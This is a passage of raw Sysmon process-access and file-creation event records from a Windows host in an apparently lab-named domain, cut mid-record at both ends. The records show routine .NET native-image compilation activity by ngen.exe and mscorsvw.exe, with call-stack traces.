scorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.997{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4694-6000-A904-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:47.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:47.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:47.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.888{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469B-6000-AF04-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.873{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-469B-6000-AF04-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.873{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469B-6000-AF04-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:51.810{08A6967A-469B-6000-AE04-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ec-0\System.Web.ApplicationServices.dll2021-01-14 13:26:51.810 10341000x80000000000000008822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.763{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469B-6000-AE04-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.748{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-469B-6000-AE04-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.748{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469B-6000-AE04-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469B-6000-AD04-000000009A01}984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.685{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469B-6000-AD04-000000009A01}984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.685{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469B-6000-AD04-000000009A01}984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:51.638{08A6967A-469B-6000-AC04-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\100c-0\System.Web.Abstractions.dll2021-01-14 13:26:51.638 10341000x80000000000000008815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469B-6000-AC04-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.592{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-469B-6000-AC04-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.592{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469B-6000-AC04-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.498{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469B-6000-AB04-000000009A01}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.482{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-469B-6000-AB04-000000009A01}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:51.482{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469B-6000-AB04-000000009A01}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:51.092{08A6967A-4695-6000-AA04-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c10-0\System.Web.dll2021-01-14 13:26:51.092 10341000x80000000000000008829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:52.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-469C-6000-B004-000000009A01}608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:52.045{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-469C-6000-B004-000000009A01}608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:52.045{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-469C-6000-B004-000000009A01}608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:53.842{08A6967A-469C-6000-B004-000000009A01}608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\260-0\System.Web.DataVisualization.dll2021-01-14 13:26:53.842 10341000x80000000000000008843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 